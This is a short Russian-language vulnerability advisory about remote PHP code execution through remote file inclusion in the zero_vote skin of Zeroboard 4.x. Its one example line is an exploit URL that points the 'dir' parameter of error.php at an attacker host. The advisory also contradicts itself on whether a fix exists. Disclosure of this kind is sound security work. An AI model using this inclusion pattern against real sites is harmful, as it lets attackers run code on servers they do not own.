Удаленное выполнение произвольного PHP кода в Zeroboard

Дата публикации:
10.01.2005
Всего просмотров:
5324
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0380
CVE-2005-0495
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Zeroboard 4.x
Уязвимые версии: Zeroboard

Описание: Уязвимость в Zeroboard в zero_vote теме позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Пример/Эксплоит:

http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]

URL производителя: http://www.nzeo.com/?channel=zeroboard

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: New Vulnerability

или введите имя

CAPTCHA